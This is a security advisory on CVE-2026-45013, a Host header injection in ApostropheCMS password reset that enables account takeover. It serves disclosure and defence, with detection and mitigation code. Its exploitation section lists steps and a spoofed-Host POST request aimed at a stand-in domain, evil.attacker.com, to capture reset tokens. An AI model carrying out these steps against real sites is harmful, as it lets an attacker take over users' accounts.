CVE-2026-45013
JavaScript vulnerability analysis and mitigation

Overview

CVE-2026-45013 is a Host Header Injection vulnerability in ApostropheCMS's password reset flow that enables full account takeover. The vulnerability affects the apostrophe npm package at versions <= 4.29.0, with no patched version currently available. It was published on May 13, 2026, by maintainer boutell and added to the GitHub Advisory Database on May 14, 2026. The CVE carries a CVSS v3.1 base score of 8.1 (High) (GitHub Advisory, ApostropheCMS Advisory).

Technical details

The root cause is improper input validation (CWE-20) combined with a weak password recovery mechanism (CWE-640). The setPrefixUrls middleware in ApostropheCMS constructs req.baseUrl and req.absoluteUrl directly from the HTTP Host header via req.hostname, without sanitization. The resetRequest route in modules/@apostrophecms/login/index.js then uses this tainted value to build the password reset URL, appending the real, valid reset token as a query parameter before emailing it to the victim. This attack path is only active when passwordReset: true is set in the login module options and apos.baseUrl is not explicitly configured — a condition described as common in development and some production deployments. When apos.baseUrl is configured, it is used unconditionally and the attacker's Host header is ignored (GitHub Advisory).

Impact

Successful exploitation results in full account takeover of any user account whose email address is known to the attacker. The attacker gains high confidentiality and integrity impact — they can capture a valid password reset token, reset the victim's password, and authenticate as that user, potentially accessing all data and functionality available to that account. Availability is not directly impacted. Because no authentication is required from the attacker and the victim only needs to click a link in a legitimate-looking email from their own site, the social engineering barrier is low (ApostropheCMS Advisory).

Exploitation steps

  1. Reconnaissance: Identify an ApostropheCMS instance running apostrophe npm package <= 4.29.0 with passwordReset: true enabled and apos.baseUrl not configured. Enumerate a valid user email address from the site's public interface (e.g., author pages, contact forms, or public profiles).
  2. Craft malicious request: Prepare a POST request to the password reset endpoint with the Host header set to an attacker-controlled domain:
POST /api/v1/login/reset-request
Host: evil.attacker.com
Content-Type: application/json

{"email": "victim@example.com"}
  3. Trigger reset email: Send the crafted request to the target ApostropheCMS server. The application's setPrefixUrls middleware reads req.hostname from the spoofed Host header and constructs the reset URL pointing to evil.attacker.com.
  4. Capture the token: The application emails the victim a legitimate-looking password reset link such as http://evil.attacker.com/login?reset=TOKEN&email=victim@example.com. Set up an HTTP listener on the attacker-controlled domain to capture incoming requests and extract the reset token parameter when the victim clicks the link.
  5. Account takeover: Use the captured TOKEN to call the real target site's password reset completion endpoint, set a new password, and authenticate as the victim, achieving full account takeover (ApostropheCMS Advisory).

Indicators of compromise

  • Network: Outbound SMTP traffic delivering password reset emails containing URLs pointing to unexpected or external domains (not the site's own domain); HTTP POST requests to /api/v1/login/reset-request with a Host header value that does not match the legitimate site domain.
  • Logs: Web server access logs showing POST /api/v1/login/reset-request requests with anomalous Host header values (e.g., Host: evil.attacker.com); email delivery logs showing reset emails sent to users who did not initiate a reset, or reset emails with URLs containing external domains.
  • Application: Multiple password reset requests for the same email address in a short time window; password reset tokens being consumed shortly after issuance without a corresponding login from the expected IP range (ApostropheCMS Advisory).
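
As an added example (not from the advisory or the Wiz page), the following script implements the two log-based indicators above over constructed access log lines: POSTs to /api/v1/login/reset-request whose Host does not match the site's own domains, and bursts of reset requests from one source IP. The log format is an assumed nginx-style line with the request's Host appended as `host=<value>`; the allowlist, thresholds and sample lines are constructed for the demonstration and must be adapted to the real deployment.

```javascript
// Added detection sketch for the log-based indicators above; not from the page's
// source. Log format, allowlist, thresholds and sample lines are constructed.
const ALLOWED_HOSTS = new Set(['www.example.com', 'example.com']);
const RESET_PATH = '/api/v1/login/reset-request';

// Assumed format: nginx combined log with ` host=$host` appended at the end.
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "[^"]*" host=(\S+)$/;
const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5, Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// CLF timestamp (13/May/2026:10:00:05 +0000) -> milliseconds since the epoch.
function parseClfTime(s) {
  const m = /^(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$/.exec(s);
  if (!m) return NaN;
  const asUtc = Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]);
  const offsetMs = (m[7] === '-' ? -1 : 1) * ((+m[8]) * 60 + (+m[9])) * 60000;
  return asUtc - offsetMs;
}

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: parseClfTime(m[2]), method: m[3], path: m[4], status: +m[5], host: m[6] };
}

// Lines are expected in time order (as in a live access log). Returns findings:
//   { type: 'host-mismatch', ... } for every reset POST with a foreign Host, and
//   { type: 'burst', ... } once per IP that sends >= burstThreshold reset POSTs
//   within windowMs.
function analyze(lines, { allowedHosts = ALLOWED_HOSTS, windowMs = 60000, burstThreshold = 3 } = {}) {
  const findings = [];
  const perIp = new Map();
  const bursted = new Set();
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || e.method !== 'POST' || e.path !== RESET_PATH) continue;
    const host = e.host.toLowerCase().replace(/:\d+$/, ''); // normalise case and port
    if (!allowedHosts.has(host)) {
      findings.push({ type: 'host-mismatch', ip: e.ip, host: e.host, time: e.time });
    }
    const times = perIp.get(e.ip) || [];
    times.push(e.time);
    while (times.length && e.time - times[0] > windowMs) times.shift(); // sliding window
    perIp.set(e.ip, times);
    if (times.length >= burstThreshold && !bursted.has(e.ip)) {
      bursted.add(e.ip);
      findings.push({ type: 'burst', ip: e.ip, count: times.length, windowMs });
    }
  }
  return findings;
}

// Constructed sample log: one legitimate reset, three spoofed-Host requests in
// quick succession from one IP, and one legitimate request with mixed case and port.
const SAMPLE_LOG = [
  '203.0.113.7 - - [13/May/2026:10:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0" host=www.example.com',
  '203.0.113.7 - - [13/May/2026:10:00:05 +0000] "POST /api/v1/login/reset-request HTTP/1.1" 200 45 "-" "Mozilla/5.0" host=www.example.com',
  '198.51.100.9 - - [13/May/2026:10:02:10 +0000] "POST /api/v1/login/reset-request HTTP/1.1" 200 45 "-" "curl/8.4.0" host=evil.attacker.com',
  '198.51.100.9 - - [13/May/2026:10:02:11 +0000] "POST /api/v1/login/reset-request HTTP/1.1" 200 45 "-" "curl/8.4.0" host=evil.attacker.com',
  '198.51.100.9 - - [13/May/2026:10:02:13 +0000] "POST /api/v1/login/reset-request HTTP/1.1" 200 45 "-" "curl/8.4.0" host=evil.attacker.com',
  '192.0.2.44 - - [13/May/2026:10:05:00 +0000] "POST /api/v1/login/reset-request HTTP/1.1" 200 45 "-" "Mozilla/5.0" host=Example.com:443'
];

console.log(analyze(SAMPLE_LOG));
```

Note that the application logs the email address, not the access log, so the "multiple resets for the same email" indicator has to be run against the application's own log or database; the burst rule above is the nearest network-layer approximation.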

Mitigation and workarounds

No patched version of the apostrophe npm package is currently available (all versions <= 4.29.0 are affected). The primary immediate workaround is to explicitly configure apos.baseUrl in the ApostropheCMS application configuration, which causes the reset URL to be constructed from the trusted configured value rather than the attacker-controlled Host header:

// app.js or module configuration
modules: {
  '@apostrophecms/express': {
    options: {
      baseUrl: 'https://yourdomain.com'
    }
  }
}

Additionally, operators should validate the Host header at the reverse proxy or web server layer and reject requests with unexpected values. Because Express's req.hostname is taken from X-Forwarded-Host rather than Host when the trust proxy setting is enabled, the proxy must also overwrite or drop any client-supplied X-Forwarded-Host, or the allowlist check can be bypassed. Operators should also consider disabling passwordReset: true if the feature is not strictly required until a framework-level fix is released (ApostropheCMS Advisory).
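
The following is an added example of the Host header validation workaround as an Express-style middleware; it is not ApostropheCMS code, and the allowed host list and the 400 response are assumptions for the demonstration. It checks both Host and X-Forwarded-Host against an allowlist, normalises case and port, and rejects anything else before the login routes see it.

```javascript
// Added example: Host allowlist middleware in Express (req, res, next) style.
// Not part of ApostropheCMS; ALLOWED_HOSTS is an assumed deployment-specific list.
const ALLOWED_HOSTS = new Set(['yourdomain.com', 'www.yourdomain.com']);

// Normalise a Host header value: trim, lowercase, strip a trailing port, and
// refuse anything that is not a plain hostname token (IPv6 literals and
// comma-joined duplicate headers are rejected rather than guessed at).
function normalizeHost(raw) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.includes(',')) return null;
  const noPort = raw.trim().toLowerCase().replace(/:\d+$/, '');
  return /^[a-z0-9.-]+$/.test(noPort) ? noPort : null;
}

// Returns middleware that rejects the request unless every host-bearing header
// present (Host, and X-Forwarded-Host if a client sent one) is on the allowlist.
// Express's req.hostname may be sourced from X-Forwarded-Host when 'trust proxy'
// is enabled, so the raw headers are checked rather than req.hostname.
function hostAllowlist(allowed = ALLOWED_HOSTS) {
  return function (req, res, next) {
    const candidates = [req.headers.host, req.headers['x-forwarded-host']]
      .filter((h) => h !== undefined);
    const ok = candidates.length > 0 && candidates.every((h) => {
      const n = normalizeHost(h);
      return n !== null && allowed.has(n);
    });
    if (!ok) {
      res.statusCode = 400;
      res.end('Bad Request: unexpected Host');
      return;
    }
    next();
  };
}

// Drive the middleware with a fake req/res so it can be exercised without a server.
function runMiddleware(headers, allowed) {
  const req = { headers };
  const res = { statusCode: 200, body: null, end(b) { this.body = b; } };
  let passed = false;
  hostAllowlist(allowed)(req, res, () => { passed = true; });
  return { passed, statusCode: res.statusCode };
}

console.log(runMiddleware({ host: 'yourdomain.com' }));                                   // passed: true
console.log(runMiddleware({ host: 'evil.attacker.com' }));                                // passed: false, 400
console.log(runMiddleware({ host: 'yourdomain.com', 'x-forwarded-host': 'evil.attacker.com' })); // passed: false
```

Mount it with app.use(hostAllowlist()) ahead of the login routes. The equivalent at the edge is a catch-all server block on the reverse proxy (for nginx, a default_server that returns 444) so that only the named virtual hosts ever reach the application; the middleware then acts as a second check in case the proxy configuration drifts.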

Community reactions

The advisory was published by ApostropheCMS maintainer boutell directly in the project's GitHub Security Advisories on May 13, 2026, and credited researchers Mujahidkhan525 (finder) and VadlaReddySai (reporter). No significant broader media coverage or notable public researcher commentary beyond the advisory itself has been observed at this time (ApostropheCMS Advisory).

Additional resources

Source: This report was generated with the help of AI.

Related JavaScript vulnerabilities:

CVE ID         | Severity | Score | Technologies | Component name     | CISA KEV exploit | Fixed | Publication date
CVE-2026-44990 | CRITICAL | 9.3   | JavaScript   | sanitize-html      | No               | Yes   | Jun 12, 2026
CVE-2026-45013 | HIGH     | 8.1   | JavaScript   | apostrophe         | No               | No    | Jun 12, 2026
CVE-2026-45012 | HIGH     | 7.6   | JavaScript   | apostrophe         | No               | No    | Jun 12, 2026
CVE-2026-45011 | HIGH     | 7.3   | JavaScript   | apostrophe         | No               | No    | Jun 12, 2026
CVE-2026-42853 | MEDIUM   | 6.5   | JavaScript   | @apostrophecms/cli | No               | No    | Jun 12, 2026
